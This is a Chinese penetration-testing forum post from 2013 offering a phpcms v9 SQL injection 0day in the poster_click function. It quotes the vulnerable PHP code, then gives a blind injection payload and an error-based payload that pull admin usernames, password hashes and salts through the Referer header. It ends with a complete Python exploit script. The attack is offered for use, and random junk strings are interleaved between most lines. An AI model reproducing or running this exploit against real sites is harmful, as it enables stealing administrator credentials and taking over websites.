中国网络渗透测试联盟
标题:
phpcms post_click注入0day利用代码
[打印本页]
作者:
admin
时间:
2013-1-11 21:01
标题:
phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
. z: y% i) Z, S4 M
7 p) W2 A2 n! R0 t: y1 I
问题函数\phpcms\modules\poster\index.php
. M' k7 @( y" m3 i
8 ]9 \. x: q) [/ I
public function poster_click() {
+ ]" N3 _, g! F Q$ }. l4 m# i: X
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
5 k2 [: T* |8 C& n+ G# m! z$ y, ?, g
$r = $this->db->get_one(array('id'=>$id));
! z% A( N( U+ ~; R3 b
if (!is_array($r) && empty($r)) return false;
8 g4 S% @( X# H0 T
$ip_area = pc_base::load_sys_class('ip_area');
' n, W. B$ j- ?& i8 m; C" @, I
$ip = ip();
: u7 o |, ]( ]( l% u- R; @* L: Y
$area = $ip_area->get($ip);
1 s% S$ a& k: u& g
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
! z! K2 y4 b! X$ Q" [ w
if($id) {
2 k; y8 _" }8 T# J" b, ], {6 Z
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
( D9 f" p6 v2 D
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) g0 i% M' m) Y; Q# o! u3 o; c
}
" e# b" G4 L8 J1 k1 o
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$ x; v( v: }7 L2 j
$setting = string2array($r['setting']);
, I: _9 m. L" B8 i: G
if (count($setting)==1) {
m) a! Z9 \1 d0 S
$url = $setting['1']['linkurl'];
8 R& d( w; T U5 |
} else {
" u5 e. ?0 P7 t' j
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
9 c f( r: _* U" Y0 h$ m# H7 B
}
8 s# k# L9 r" ^- K' j6 p
header('Location: '.$url);
2 V' s3 M- w3 D D- ?5 O/ `0 t
}
8 h% r3 J" B; U6 ?3 W) ^0 f
9 K7 I- M: c3 e( U; t9 N# p
+ w$ Y1 v( r# I# i3 r: v
$ I1 i$ ~. g" v/ M, G; E8 Y9 f
利用方式:
0 y' ^# a7 O7 S6 J6 G. \& m
2 E4 \7 t6 }1 i1 g3 ^4 \& M- g
1、可以采用盲注入的手法:
: t+ c) \: X/ m) ~6 p
! z" D& V# K3 M
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
2 _& k, b' ?1 E; r- ]
3 T0 u6 g6 R3 f x0 f- x
通过返回页面,正常与否一个个猜解密码字段。
* ?( L/ x& V5 f$ h; p5 v
' c [7 K* d2 w% y* q
2、代码是花开写的,随手附上了:
1 A- [4 {1 `$ N
, B8 A0 g, W. p
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
3 E; d; P" d; s! I/ A
9 m# |3 {# z& B& D+ ]
此方法是爆错注入手法,原理自查。
0 |7 T! W n0 s9 p5 H! s; d& O
) ^% ?! j" N8 |1 \
" C+ A# T5 ^) {/ b' Y+ E
6 ^, o; d+ i' M
利用程序:
. J6 L9 s/ ?- o& K4 M
) Y& O& r4 T2 `9 t4 ~
#!/usr/bin/env python
( [6 V8 Y' `, ~
import httplib,sys,re
8 }, I$ n+ k( @+ O2 r* \
& ~$ s' n2 m( L- c3 {8 j7 R
def attack():
6 T0 H/ L/ x$ h$ q7 G8 ?
print “Code by Pax.Mac Team conqu3r!”
- K' c' e, S5 t* e% S9 o
print “Welcome to our zone!!!”
+ |' X: Z' o% x( V; P# E& S
url=sys.argv[1]
1 h# Z" Y; p# N( N3 H" f) X8 ?
paths=sys.argv[2]
8 I- u$ {$ D' ^8 [/ U4 P* N
conn = httplib.HTTPConnection(url)
* U s* M( `8 R+ z1 E
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
6 M1 E7 [- H% c) z) S
“Accept”: “text/plain”,
1 ]0 Y1 W3 P3 {4 ?. @
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
c8 P7 t7 r" B( N5 Y
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
6 f! \% p2 @* H! W
r1 = conn.getresponse()
" o2 ]) M" d& L8 p% A. T
datas=r1.read()
' T! e: P& M5 s4 _. E5 B
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
" b2 _) c) u: G8 c9 k
print datas[0]
* N: D, J1 {- o5 X/ ^: L0 \! D
conn.close()
) b+ S% o/ G, G4 ?3 U! _- w
if __name__==”__main__”:
8 e3 j( S% J1 ? a' i- Y
if len(sys.argv)<3:
7 C2 o" U$ n0 D# q+ _
print “Code by Pax.Mac Team conqu3r”
2 P0 C& B$ |# H2 M( X
print “Usgae:”
) U* { t' z! k3 c# E
print “ phpcmsattack.py
www.paxmac.org
/”
8 |0 x; Z$ n& l
print “ phpcmsataack.py
www.paxmac.org
/phpcmsv9/”
8 m! p$ y, Y0 b
sys.exit(1)
3 g! F8 g* g. z- L) l7 B, H
attack()
+ G% U, z6 `( T! c* c7 M
/ ]/ `$ l) c( b: B z) Q; w& p
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2